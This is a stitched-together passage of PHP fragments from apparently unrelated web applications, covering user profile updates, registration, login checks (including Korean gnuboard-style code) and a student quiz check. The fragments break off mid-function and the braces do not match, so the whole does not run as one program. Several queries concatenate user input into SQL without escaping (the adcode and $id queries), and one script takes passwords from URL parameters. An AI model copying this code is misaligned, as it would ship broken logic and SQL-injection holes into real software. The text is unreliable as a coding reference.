} elseif (!$admin_mode && trim($_POST['email']) != $current_user->user_email && email_exists(trim($_POST['email']), false)) {
array_push($messages, _('ya existe otro usuario con esa dirección de correo'));
$errors++;
} else {
$user->email = trim($_POST['email']);
}
$user->url = htmlspecialchars(clean_input_url($_POST['url']));
// Check IM address
if (!empty($_POST['public_info'])) {
$_POST['public_info'] = htmlspecialchars(clean_input_url($_POST['public_info']));
$public = $db->escape($_POST['public_info']);
$im_count = intval($db->get_var("select count(*) from users where user_id != {$user->id} and user_level != 'disabled' and user_level != 'autodisabled' and user_public_info='{$public}'"));
if ($im_count > 0) {
array_push($messages, _('ya hay otro usuario con la misma dirección de MI, no se ha grabado'));
$_POST['public_info'] = '';
$errors++;
}
}
$user->phone = $_POST['phone'];
$user->public_info = htmlspecialchars(clean_input_url($_POST['public_info']));
// End check IM address
if ($user->id == $current_user->user_id) {
// Check phone number
if (!empty($_POST['phone'])) {
if (!preg_match('/^\\+[0-9]{9,16}$/', $_POST['phone'])) {
array_push($messages, _('número telefónico erróneo, no se ha grabado'));
$_POST['phone'] = '';
$errors++;
} else {
$phone = $db->escape($_POST['phone']);
$phone_count = intval($db->get_var("select count(*) from users where user_id != {$user->id} and user_level != 'disabled' and user_level != 'autodisabled' and user_phone='{$phone}'"));
if ($phone_count > 0) {
array_push($messages, _('ya hay otro usuario con el mismo número, no se ha grabado'));
$_POST['phone'] = '';
$errors++;
}
}
}
$user->phone = $_POST['phone'];
// End check phone number
}
// Verifies adsense code
if ($globals['external_user_ads']) {
$_POST['adcode'] = trim($_POST['adcode']);
$_POST['adchannel'] = trim($_POST['adchannel']);
if (!empty($_POST['adcode']) && $user->adcode != $_POST['adcode']) {
if (!preg_match('/pub-[0-9]{16}$/', $_POST['adcode'])) {
array_push($messages, _('código AdSense incorrecto, no se ha grabado'));
$_POST['adcode'] = '';
$errors++;
} else {
$adcode_count = intval($db->get_var("select count(*) from users where user_id != {$user->id} and user_level != 'disabled' and user_level != 'autodisabled' and user_adcode='" . $_POST['adcode'] . "'"));
if ($adcode_count > 0) {
array_push($messages, _('ya hay otro usuario con la misma cuenta, no se ha grabado'));
$_POST['adcode'] = '';
$errors++;
}
}
}
if (!empty($_POST['adcode']) && !empty($_POST['adchannel']) && $user->adchannel != $_POST['adchannel']) {
if (!preg_match('/^[0-9]{10,12}$/', $_POST['adchannel'])) {
array_push($messages, _('canal AdSense incorrecto, no se ha grabado'));
$_POST['adchannel'] = '';
$errors++;
}
}
$user->adcode = $_POST['adcode'];
$user->adchannel = $_POST['adchannel'];
}
$user->names = clean_text($_POST['names']);
if (!empty($_POST['password']) || !empty($_POST['password2'])) {
if (!check_password($_POST["password"])) {
array_push($messages, _('Clave demasiado corta, debe ser de 6 o más caracteres e incluir mayúsculas, minúsculas y números'));
$errors = 1;
} else {
if (trim($_POST['password']) !== trim($_POST['password2'])) {
array_push($messages, _('las claves no son iguales, no se ha modificado'));
$errors = 1;
} else {
$new_pass = trim($_POST['password']);
$user->pass = UserAuth::hash($new_pass);
array_push($messages, _('La clave se ha cambiado'));
$pass_changed = true;
}
}
}
if ($admin_mode && !empty($_POST['user_level'])) {
$user->level = $db->escape($_POST['user_level']);
}
if ($admin_mode && !empty($_POST['karma']) && is_numeric($_POST['karma']) && $_POST['karma'] > 4 && $_POST['karma'] <= 20) {
$user->karma = $_POST['karma'];
}
$user->comment_pref = intval($_POST['comment_pref']) + (intval($_POST['show_friends']) & 1) * 2 + (intval($_POST['show_2cols']) & 1) * 4;
// Manage avatars upload
if (!empty($_FILES['image']['tmp_name'])) {
if (avatars_check_upload_size('image')) {
$avatar_mtime = avatars_manage_upload($user->id, 'image');
if (!$avatar_mtime) {
array_push($messages, _('error guardando la imagen'));
$errors = 1;
$user->avatar = 0;
} else {
$user->avatar = $avatar_mtime;
}
} else {
array_push($messages, _('el tamaño de la imagen excede el límite'));
$errors = 1;
$user->avatar = 0;
}
} elseif ($_POST['avatar_delete']) {
$user->avatar = 0;
avatars_remove($user->id);
}
// Reset avatar for the logged user
if ($current_user->user_id == $user->id) {
$current_user->user_avatar = $user->avatar;
}
if (!$errors) {
if (empty($user->ip)) {
$user->ip = $globals['user_ip'];
}
$user->store();
$user->read();
if (!$admin_mode && ($current_user->user_login != $user->username || $current_user->user_email != $user->email || $new_pass)) {
$current_user->Authenticate($user->username, $new_pass);
}
array_push($messages, _('datos actualizados'));
}
return $messages;
}
<?php
include 'include/database.class.php';
/*If any registration is invalid,
/ set up error message in error string
/ to inform to the other page.error.php
*/
if (isset($_GET['uname'], $_GET['uemail'], $_GET['upassword'])) {
$uname = filter_input(INPUT_GET, 'uname', FILTER_SANITIZE_STRING);
// $uemail = $_GET['uemail'];
$uemail = filter_input(INPUT_GET, 'uemail', FILTER_SANITIZE_EMAIL);
$upassword = $_GET['upassword'];
check_email($uemail);
check_user_exists($uname, $uemail);
check_password($upassword);
insert_user($uname, $uemail, $upassword);
} else {
$mgs = "INFORMATION NOT PROPERLY SET";
send_error($mgs);
}
function check_email($uemail)
{
if (!filter_var($uemail, FILTER_VALIDATE_EMAIL)) {
$mgs = "INVALID EMAIL";
send_error($mgs);
} else {
if (check_email_exists($uemail)) {
$mgs = "EMAIL ALREADY REGISTERED";
send_error($mgs);
exit;
} else {
{
echo $_SESSION['msg'];
unset($_SESSION['msg']);
}
$dis = "none";
if (isset($_SESSION['msg'])) {
$dis = "block";
}
//
if (isset($_POST['email']) && isset($_POST['password'])) {
mysql_select_db($database_contacts, $contacts);
$query_logincheck = "SELECT * FROM users WHERE user_email = '" . mysql_real_escape_string($_POST['email']) . "'";
$logincheck = mysql_query($query_logincheck, $contacts) or die(mysql_error());
$row_logincheck = mysql_fetch_assoc($logincheck);
$totalRows_logincheck = mysql_num_rows($logincheck);
if ($totalRows_logincheck == 1 && check_password($_POST['password'], $row_logincheck['user_password'], $row_logincheck['user_salt'])) {
$_SESSION['user'] = mysql_real_escape_string($_POST['email']);
$redirect = $row_logincheck['user_home'];
header(sprintf('Location: %s', $redirect));
die;
} else {
set_msg('Incorrect Username or Password');
header('Location: login.php');
die;
}
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<?php
include_once './_common.php';
$g5['title'] = "로그인 검사";
$mb_id = trim($_POST['mb_id']);
$mb_password = trim($_POST['mb_password']);
if (!$mb_id || !$mb_password) {
alert('회원아이디나 비밀번호가 공백이면 안됩니다.');
}
$mb = get_member($mb_id);
// 가입된 회원이 아니다. 비밀번호가 틀리다. 라는 메세지를 따로 보여주지 않는 이유는
// 회원아이디를 입력해 보고 맞으면 또 비밀번호를 입력해보는 경우를 방지하기 위해서입니다.
// 불법사용자의 경우 회원아이디가 틀린지, 비밀번호가 틀린지를 알기까지는 많은 시간이 소요되기 때문입니다.
if (!$mb['mb_id'] || !check_password($mb_password, $mb['mb_password'])) {
alert('가입된 회원아이디가 아니거나 비밀번호가 틀립니다.\\n비밀번호는 대소문자를 구분합니다.');
}
// 차단된 아이디인가?
if ($mb['mb_intercept_date'] && $mb['mb_intercept_date'] <= date("Ymd", G5_SERVER_TIME)) {
$date = preg_replace("/([0-9]{4})([0-9]{2})([0-9]{2})/", "\\1년 \\2월 \\3일", $mb['mb_intercept_date']);
alert('회원님의 아이디는 접근이 금지되어 있습니다.\\n처리일 : ' . $date);
}
// 탈퇴한 아이디인가?
if ($mb['mb_leave_date'] && $mb['mb_leave_date'] <= date("Ymd", G5_SERVER_TIME)) {
$date = preg_replace("/([0-9]{4})([0-9]{2})([0-9]{2})/", "\\1년 \\2월 \\3일", $mb['mb_leave_date']);
alert('탈퇴한 아이디이므로 접근하실 수 없습니다.\\n탈퇴일 : ' . $date);
}
if ($config['cf_use_email_certify'] && !preg_match("/[1-9]/", $mb['mb_email_certify'])) {
$ckey = md5($mb['mb_ip'] . $mb['mb_datetime']);
confirm("{$mb['mb_email']} 메일로 메일인증을 받으셔야 로그인 가능합니다. 다른 메일주소로 변경하여 인증하시려면 취소를 클릭하시기 바랍니다.", G5_URL, G5_BBS_URL . '/register_email.php?mb_id=' . $mb_id . '&ckey=' . $ckey);
}
@(include_once $member_skin_path . '/login_check.skin.php');
echo display_message($f_message, $f_language);
die;
} else {
// get student basic information
$l_sql = " select student_id, dateregistered, lastaccess, lname, fname, gender, birthday ";
$l_sql .= " ,church, salvation, coname, address1, address2, city ";
$l_sql .= " ,prov, pcode, country, phone, email, lessonpts, bonuspts, awards, events, comments, zone, jonathan ";
$l_sql .= " from student where binary id = '" . $id . "' ";
$result = sql_query($l_sql, $dbi);
list($f_student_id, $f_dateregistered, $f_lastaccess, $f_lname, $f_fname, $f_gender, $f_birthday, $f_church, $f_salvation, $f_coname, $f_address1, $f_address2, $f_city, $f_prov, $f_pcode, $f_country, $f_phone, $f_email, $f_lessonpts, $f_bonuspts, $f_awards, $f_events, $f_comments, $f_zone, $f_jonathan) = sql_fetch_array($result);
$l_sql = "select sum(a.points) from history a, student b where a.student_id = b.student_id and b.id = '" . $id . "'";
$result = sql_query($l_sql, $dbi);
list($f_lessonpts) = sql_fetch_array($result);
}
//(3) check the password
if (!isset($password) or $password == "" or check_password($id, $password) < 0) {
$f_message .= _PASS_INCORRECT;
echo display_message($f_message, $f_language);
die;
}
//(4) to check the user hasn't already completed this quiz.
//(4.0) fix the data of history, this is one time running
//fix_history();
//(4.1) to check the student and lesson
if ($f_student_id > 0 and $f_lesson_id > 0) {
if (check_complete_lesson($f_student_id, $f_lesson_id) == 0) {
$f_message .= _COMPLETED_LESSON;
echo display_message($f_message, $f_language);
die;
}
}
